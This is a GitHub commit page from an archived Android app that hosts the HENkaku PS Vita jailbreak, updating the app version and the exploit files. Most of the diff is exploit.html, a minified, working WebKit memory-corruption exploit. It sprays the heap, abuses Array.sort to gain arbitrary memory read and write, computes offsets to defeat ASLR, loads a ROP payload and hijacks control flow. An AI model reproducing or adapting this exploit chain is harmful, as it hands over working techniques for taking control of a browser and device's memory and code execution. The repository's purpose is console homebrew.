Skip to content
This repository has been archived by the owner on Mar 14, 2019. It is now read-only.

Commit

Permalink
Updated HENkaku to Release 5.
Browse files Browse the repository at this point in the history 
Updated VitaShell to 0.91.
  • Loading branch information
@codestation
codestation committed Sep 6, 2016
1 parent 5134e30 commit 887de65
Show file tree
Hide file tree
Showing 4 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions app/build.gradle
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,8 +8,8 @@ android {
applicationId "com.codestation.henkakuserver"
minSdkVersion 15
targetSdkVersion 24
versionCode 5
versionName "1.4"
versionCode 6
versionName "1.5"
}
buildTypes {
release {
Expand Down
2 changes: 1 addition & 1 deletion app/src/main/assets/exploit.html
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
<script src='payload.js'></script><script>var r,a,e,t,n,l,o,i,f,v,s,c;var u,y,w,p,d,g,h,b,k;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;l=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}if(I==null){alert("restart the browser");while(1){}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}o=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){o=e[V];break}}if(!o){alert("failed");while(1){}}var K=o;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=l;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var V=0;V<a.length;++V){if(a[V].rows==l){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;b=S(g+101364)-3417;k=S(b+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+k;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");
<noscript>Go to browser settings and check "Enable JavaScript", then reload this page.</noscript><script src='payload.js'></script><script>var r,a,e,t,n,l,o,i,f,v,s,c;var u,y,w,p,d,g,h,b,k;var A,U;var m=64+payload[16/4];m/=4;var F=null;function D(r,a){if(!F)F=new DataView(new ArrayBuffer(16));F.setUint32(0,a);F.setUint32(4,r);return F.getFloat64(0)}function E(r){if(!F)F=new DataView(new ArrayBuffer(16));F.setFloat64(0,r);return{low:F.getUint32(4),hi:F.getUint32(0)}}var x=0;var L=0;var B=new Uint32Array(1024);function S(r){x=K[r/4];L=K[r/4+1];return((x&4095|(x&983040)>>4)&65535|((L&4095|(L&983040)>>4)&65535)<<16)>>>0}r=16384;a=new Array(r);e=new Array(r);t=4932;n=1717920867;l=1431655765;for(var V=0;V<e.length;++V){e[V]=new Uint32Array(t/4);var H=document.createElement("textarea");H.rows=n;a[V]=H}for(var V=0;V<1024;++V){var H=document.createElement("textarea");H.rows=n;a.push(H)}var N=12288;var W=Array.prototype.constructor.apply(null,new Array(N));var j=2048;var q=new Array(j);var z={};var C=new Array(256);z.toString=function(){W.push(12345);for(var r=0;r<C.length;++r){var a=Array.prototype.constructor.apply(null,q);a[0]=0;a[1]=1;a[2]=2;C[r]=a}return""};W[0]=z;var G=D(2147483648,2147483648);for(var V=1;V<8192;++V)W[V]=G;W.sort();contents="";cur=0;z.toString=function(){};var I=null;for(var V=0;V<C.length;++V){if(C[V].length!=j){I=C[V];break}}if(I==null){alert("restart the browser");while(1){}}var J=536870912-69632;for(;;J--){if(I[J]!=0){F.setFloat64(0,I[J]);if(F.getUint32(0)==t/4){F.setUint32(0,4026531808);I[J]=F.getFloat64(0);F.setFloat64(0,I[J-2]);v=F.getUint32(4);F.setUint32(4,0);F.setUint32(0,2147483648);I[J-2]=F.getFloat64(0);break}}}o=null;for(var V=0;V<e.length;++V){if(e[V].byteLength!=t){o=e[V];break}}if(!o){alert("failed");while(1){}}var K=o;var M=v;f=v;for(var O=f/4;O<f/4+16384;++O){if(K[O]==n){K[O]=l;s=O*4;i=true;break}}if(!i){alert("Did not find Element signature");while(1){}}var P=false;var Q;for(var V=0;V<a.length;++V){if(a[V].rows==l){Q=a[V];P=true;break}}if(!P){alert("Did not find corrupted textarea");while(1){}}var R=s-112;var T=K[R/4];u=T-11253340;y=S(u+8779012)-64073;w=S(u+8778852)-36913;p=S(u+8770276)-142693;d=S(p+2910348)-2533;g=S(d+15300)-56365;h=S(u+8778772)-9197;b=S(g+101364)-3417;k=S(b+39608)-18893;for(var V=0;V<64;V++)K[M/4+V]=K[T/4+V];K[R/4]=M;for(var V=0;V<48;++V)B[V]=K[R/4+V];K[M/4+78]=y+82032|1;Q.scrollLeft=0;c=(K[R/4+8]^(K[R/4+9]^u+3242281)>>>0)>>>0;c-=981016;for(var V=0;V<48;++V)K[R/4+V]=B[V];A=c+64;U=c+65536;O=c/4;for(var V=0;V<payload.length;++V,++O){if(V==m)O=U/4;switch(relocs[V]){case 0:K[O]=payload[V];break;case 1:K[O]=payload[V]+A;break;case 2:K[O]=payload[V]+u;break;case 3:K[O]=payload[V]+w;break;case 4:K[O]=payload[V]+y;break;case 5:K[O]=payload[V]+g;break;case 6:K[O]=payload[V]+h;break;case 7:K[O]=payload[V]+k;break;default:alert("wtf?");alert(V+" "+relocs[V])}}K[M/4+78]=u+21704;var X=M+256;K[X/4+5]=U;K[X/4+6]=u+787594|1;alert("Welcome to HENkaku!");Q.scrollLeft=X;alert("that's it");
</script>
Binary file modified app/src/main/assets/exploit.rop.bin
View file
Binary file not shown.
Binary file modified app/src/main/assets/pkg/eboot.bin
View file
Binary file not shown.

1 comment on commit 887de65

@julioapc16
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Friend makes a version HENkaku-Android for android 2.3.6?

Please sign in to comment.